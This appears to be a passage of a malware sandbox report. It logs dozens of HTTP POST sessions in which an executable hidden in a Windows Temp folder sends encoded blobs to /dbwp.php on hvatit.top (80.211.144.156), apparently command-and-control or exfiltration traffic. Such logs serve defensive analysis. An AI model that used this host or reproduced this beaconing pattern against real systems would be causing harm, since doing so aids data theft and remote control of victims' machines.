                                                        Aug 31, 2024 09:32:36.257080078 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:36.616205931 CEST2560OUTData Raw: 5a 5a 59 5f 5a 55 55 51 5d 5f 54 57 54 51 5b 5d 5a 52 59 52 52 54 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZY_ZUUQ]_TWTQ[]ZRYRRTT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'".=:7!$-<+ 00 V'409*;=<U//!]'/Z,
                                                        Aug 31, 2024 09:32:36.937262058 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        29 | 192.168.2.4 | 49765 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:36.966123104 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1408
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:37.318386078 CEST1408OUTData Raw: 5a 55 5c 56 5f 5e 55 50 5d 5f 54 57 54 58 5b 54 5a 57 59 59 52 5d 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\V_^UP]_TWTX[TZWYYR]T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&1-+S5([-?34')73<09(+](,W/!]'/Z,)
                                                        Aug 31, 2024 09:32:37.634084940 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:37.767995119 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0f 30 06 08 57 20 3b 35 0f 2a 12 3d 1c 24 0e 38 06 2c 31 36 59 3e 07 38 03 3d 39 38 51 30 3d 01 01 25 38 32 1f 25 3c 30 10 24 0e 21 5b 07 10 22 12 25 00 20 03 2c 02 0b 00 31 0e 3e 07 37 0f 3e 17 29 3d 2a 00 35 05 22 02 30 16 26 19 2e 39 26 56 2b 10 01 13 3d 28 2c 5e 27 38 2b 50 00 12 26 19 26 59 23 0a 22 10 36 10 36 06 3f 10 27 0b 01 1d 20 02 3c 11 3f 06 3e 0b 24 2f 21 0e 37 09 25 12 32 22 32 5a 2b 00 2b 50 2a 06 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: 0W ;5*=$8,16Y>8=98Q0=%82%<0$!["% ,1>7>)=*5"0&.9&V+=(,^'8+P&&Y#"66?' <?>$/!7%2"2Z++P*&].#V6YV


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        30 | 192.168.2.4 | 49766 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:37.086169004 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:37.442905903 CEST2552OUTData Raw: 5f 59 59 5f 5a 54 50 50 5d 5f 54 57 54 58 5b 50 5a 53 59 59 52 56 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _YY_ZTPP]_TWTX[PZSYYRVTRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!)?;6>$],,48'*00$$-R<;(?<;!]'/Z,5
                                                        Aug 31, 2024 09:32:37.783919096 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:37.932884932 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.2.4 | 49767 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:38.054759979 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:38.411644936 CEST2560OUTData Raw: 5a 5f 59 51 5a 59 50 53 5d 5f 54 57 54 5b 5b 5d 5a 51 59 5d 52 5c 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YQZYPS]_TWT[[]ZQY]R\T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z&2.?),T5X?-,7^43' U3+0=.?\(??./!]'/Z,)
                                                        Aug 31, 2024 09:32:38.734653950 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:38.867697954 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.2.4 | 49768 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:38.990080118 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:39.349270105 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:39.676863909 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:39.813791990 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        33 | 192.168.2.4 | 49769 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:39.945157051 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:40.361609936 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:40.629313946 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:40.763741016 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        34 | 192.168.2.4 | 49770 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:40.897130013 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:41.255403996 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:41.571801901 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:41.774658918 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        35 | 192.168.2.4 | 49771 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:41.898673058 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:42.255383968 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:42.565608025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:42.696609974 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        36 | 192.168.2.4 | 49772 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:42.782304049 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:43.164880037 CEST | 1436 | OUT
                                                        Aug 31, 2024 09:32:43.466306925 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:43.670990944 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        37 | 192.168.2.4 | 49773 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:42.845426083 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:43.251605988 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:43.521007061 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:43.648267984 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        38 | 192.168.2.4 | 49774 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:43.774976969 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:44.130479097 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:44.439225912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:44.573343992 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        39 | 192.168.2.4 | 49775 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:44.693892002 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:45.052285910 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:45.378747940 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:45.515932083 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        40 | 192.168.2.4 | 49776 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:45.646215916 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:46.005579948 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:46.391247988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:46.507901907 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        41 | 192.168.2.4 | 49777 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:46.631247044 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:46.989859104 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:47.326651096 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:47.465567112 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        42 | 192.168.2.4 | 49778 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:47.585197926 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:47.942960024 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:48.248292923 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:48.375761032 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        43 | 192.168.2.4 | 49779 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:48.509263992 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        44 | 192.168.2.4 | 49780 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:48.683661938 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1408
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:49.036638021 CEST | 1408 | OUT
                                                        Aug 31, 2024 09:32:49.389962912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:49.531050920 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        45 | 192.168.2.4 | 49781 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:48.813684940 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:49.161680937 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:32:49.490449905 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:49.621691942 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        46 | 192.168.2.4 | 49782 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:49.739918947 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:50.099323988 CEST | 2560 | OUT | Data Raw: 5f 58 5c 52 5a 5c 50 55 5d 5f 54 57 54 5d 5b 52 5a 56 59 5e 52 55 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\RZ\PU]_TWT][RZVY^RUTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$2*<<U">(]:;^#;8U09?37_3>&U<(+/?!]'/Z,1
                                                        Aug 31, 2024 09:32:50.413836002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:50.543962002 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        47 | 192.168.2.4 | 49784 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:50.669291973 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:51.021019936 CEST | 2560 | OUT | Data Raw: 5f 5f 5c 51 5a 5b 55 57 5d 5f 54 57 54 5e 5b 51 5a 52 59 5b 52 5d 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __\QZ[UW]_TWT^[QZRY[R]TRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$.A=)?6._-,7+<R&*#36+0(;'+#T/!]'/Z,=
                                                        Aug 31, 2024 09:32:51.332396030 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:51.463953972 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        48 | 192.168.2.4 | 49785 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:51.601550102 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
